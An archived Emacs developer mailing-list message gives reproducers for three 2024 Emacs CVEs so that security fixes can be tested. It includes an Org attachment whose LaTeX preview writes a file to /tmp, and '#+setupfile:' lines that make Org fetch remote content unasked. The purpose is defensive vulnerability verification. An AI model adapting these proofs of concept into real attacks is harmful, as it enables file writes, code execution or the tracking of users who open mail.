From mboxrd@z Thu Jan 1 00:00:00 1970 Path: news.gmane.io!.POSTED.blaine.gmane.org!not-for-mail From: Max Nikulin Newsgroups: gmane.emacs.devel Subject: Re: Reproducers for recent Emacs security issues Date: Sun, 14 Apr 2024 11:41:31 +0700 Message-ID: <706e1218-7451-4221-830a-ae3db3bf842e@gmail.com> References: <875xwk8w5w.fsf@melete.silentflame.com> Mime-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Injection-Info: ciao.gmane.io; posting-host="blaine.gmane.org:116.202.254.214"; logging-data="34052"; mail-complaints-to="usenet@ciao.gmane.io" User-Agent: Mozilla Thunderbird Cc: emacs-devel@gnu.org, team@security.debian.org To: Sean Whitton , Ihor Radchenko Original-X-From: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Sun Apr 14 06:42:30 2024 Return-path: Envelope-to: ged-emacs-devel@m.gmane-mx.org Original-Received: from lists.gnu.org ([209.51.188.17]) by ciao.gmane.io with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.92) (envelope-from ) id 1rvrhF-0008dv-QX for ged-emacs-devel@m.gmane-mx.org; Sun, 14 Apr 2024 06:42:29 +0200 Original-Received: from localhost ([::1] helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1rvrgZ-0004xo-1p; Sun, 14 Apr 2024 00:41:47 -0400 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rvrgV-0004xa-Qy for emacs-devel@gnu.org; Sun, 14 Apr 2024 00:41:43 -0400 Original-Received: from mail-lf1-x12a.google.com ([2a00:1450:4864:20::12a]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.90_1) (envelope-from ) id 1rvrgN-0005Y9-Nq for emacs-devel@gnu.org; Sun, 14 Apr 2024 00:41:37 -0400 Original-Received: by mail-lf1-x12a.google.com with SMTP id 2adb3069b0e04-516d2600569so2670927e87.0 for ; Sat, 13 Apr 2024 21:41:34 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20230601; t=1713069693; x=1713674493; darn=gnu.org; h=content-transfer-encoding:in-reply-to:from:content-language :references:cc:to:subject:user-agent:mime-version:date:message-id :sender:from:to:cc:subject:date:message-id:reply-to; bh=ShlVXXnGQNVRCjI0X7X37sElW6kW8I7mrsr1Y0MWYqM=; b=UxbO3i7RIn/gOuKMo8hzMghx1x9Jch3L0im4uwzfhX2zIfO/W386nMd2hQZxe82a1d DuQpk4xVTKeu+FAyuznUGMk8NOg/CGGV4ucaS1oD6YTzI5gb/77Yo0QooNGq2vRopNTQ S58w4DfJzwAfdLaSG+rUk05cIwW8bQuqENU+op1iv3PN/+ZvljVONt9PylUBo+cmyJg/ paUdOE9kWzUET+JnakdKUFceCJGpvGR6utj0xL3QeuZxmk5nT3jklP8Pigxul/l9l8wK CeYLmLXVC7JMemvxtoCVm/GbuIaNEqOcbmFHFO+FrFsHDtRMK63BDFtNTvaMHFTDS5Dj OWmw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1713069693; x=1713674493; h=content-transfer-encoding:in-reply-to:from:content-language :references:cc:to:subject:user-agent:mime-version:date:message-id :sender:x-gm-message-state:from:to:cc:subject:date:message-id :reply-to; bh=ShlVXXnGQNVRCjI0X7X37sElW6kW8I7mrsr1Y0MWYqM=; b=twWxodrXeynldkO2E+lZAqKNkKTzgyAKbAwQDvPup5bTewezC2k1xPdCPYbCNWaAkn 5YtC8HFV7NbJ6Gb83HOr+j3aFPE5cBRw3aFrc2d1gbrbp9yRFeaBRY506zLj8xiL6O4z avf+E1OeiwVFgRYSh3Teu+67Grv0RBmSvgsppH231QkmZxrP2rGNiF8xR3dkrV7FTpAd KiyX9ZfPthmzHCwDHleH2FUhYk4k1/Mqdn06efmPR/kS/kYUYzcpjlSS1zRXIBQgV2Ep LR9RohJ1Ax3/fqI8YZIUmip19RPqxk+QNG7fvWsGhgTzeCCuPn+3jYf31qt5PInv+2+N xtWw== X-Gm-Message-State: AOJu0Ywsjqteo2jukCdT0qX6JwVFRDWYQwa2guPF+PTUe0keX3tTdmmJ VnH3Wdi369UBcYN471CIzzla3CLfYA5T9cbodb9IlGTexQkF3Yvw X-Google-Smtp-Source: AGHT+IEC1tUJ1JtAWGDcgPe8I9IULHPIfhkw/maX38SBH2dqWUxO4lN2aACjw7SAZCJUfiRnMaSX7w== X-Received: by 2002:a05:6512:2fc:b0:517:8e01:2668 with SMTP id m28-20020a05651202fc00b005178e012668mr4440635lfq.67.1713069692756; Sat, 13 Apr 2024 21:41:32 -0700 (PDT) Original-Received: from [192.168.0.102] (nat-0-0.nsk.sibset.net. [5.44.169.188]) by smtp.googlemail.com with ESMTPSA id m29-20020ac24add000000b00518a8c16b65sm316858lfp.104.2024.04.13.21.41.31 (version=TLS1_3 cipher=TLS_AES_128_GCM_SHA256 bits=128/128); Sat, 13 Apr 2024 21:41:32 -0700 (PDT) Content-Language: en-US, ru-RU In-Reply-To: <875xwk8w5w.fsf@melete.silentflame.com> Received-SPF: pass client-ip=2a00:1450:4864:20::12a; envelope-from=manikulin@gmail.com; helo=mail-lf1-x12a.google.com X-Spam_score_int: 13 X-Spam_score: 1.3 X-Spam_bar: + X-Spam_report: (1.3 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, FREEMAIL_FROM=0.001, RCVD_IN_DNSWL_NONE=-0.0001, RCVD_IN_SBL_CSS=3.335, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, URI_HEX=0.1 autolearn=no autolearn_force=no X-Spam_action: no action X-BeenThere: emacs-devel@gnu.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: "Emacs development discussions." List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Original-Sender: emacs-devel-bounces+ged-emacs-devel=m.gmane-mx.org@gnu.org Xref: news.gmane.io gmane.emacs.devel:317719 Archived-At: On 14/04/2024 10:23, Sean Whitton wrote: > > I already have a sample Org file that I can use to test whether > CVE-2024-30202 is fixed. Would you happen to already have reproducers > for the other two problems to hand? LaTeX preview issue =================== - CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents as trusted. - CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by default for e-mail attachments. It requires fixes in Emacs code besides Org mode. 1. Install dvipng. Alternatively you may install dvisvgm and add to your init file (setq org-preview-latex-default-process 'dvisvgm) 2. Send a mail message with an attachment having Content-Type: text/x-org or Content-Type: text/org depending on MUA configuration. By default you may get application/vnd.lotus-organizer for .org files due to /etc/mime.types Attachment content: ---- 8< ---- #+startup: latexpreview LaTeX: \begin{equation} \newwrite\testfile\openout\testfile=\jobname.poc \write\testfile{PoC} \closeout\testfile A \to \textrm{/tmp/\jobname.poc} \end{equation} *Warning!* Change the math snippet before every test or remove the cached image. ---- >8 ---- 3. Open message. LaTeX preview never worked in attachment inline preview. Check that a file is created in /tmp/ ls -l tmp/orgtex*.poc The issue is not fixed for the scenario when an arbitrary text file is opened in Emacs directly (e.g. a file downloaded from some web site). Attempts to download remote content =================================== CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of remote files to be trusted. This affects Org Mode before 9.6.23. Actually there are 2 issues. They may be used to track that users receive messages, so mail addresses are valid. In addition they allow to download from a remote site payload for the LaTeX preview or code execution exploits. [BUG] Unsolicited download of remote resources. Fri, 2 Feb 2024 23:57:54 +0700. https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io --- 8< --- #+setupfile: http://localhost:8000/setup-1234567890.org --- >8 --- [BUG] Org may fetch remote content without asking user consent. Wed, 7 Feb 2024 17:54:07 +0700. https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io Requires installed the gvfs-backends package --- 8< --- #+setupfile: /dav:localhost#8000:/msg-123456.org --- >8 --- Notice that the following commit is not mentioned in the CVE description. https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf 2024-02-02 20:59:41 +0100 Ihor Radchenko: org: Fix security prompt for downloading remote resource Backporting fixes to Emacs-28 requires more changes since the dialog to ask user if a file should be downloaded has been implemented in Org-9.6 while Emacs-28 is shipped with Org-9.5. Trying to reproduce, you may face the following issue: [BUG] Partially broken Org mode when remote setupfile is unavailable. Tue, 19 Mar 2024 17:46:46 +0700. https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io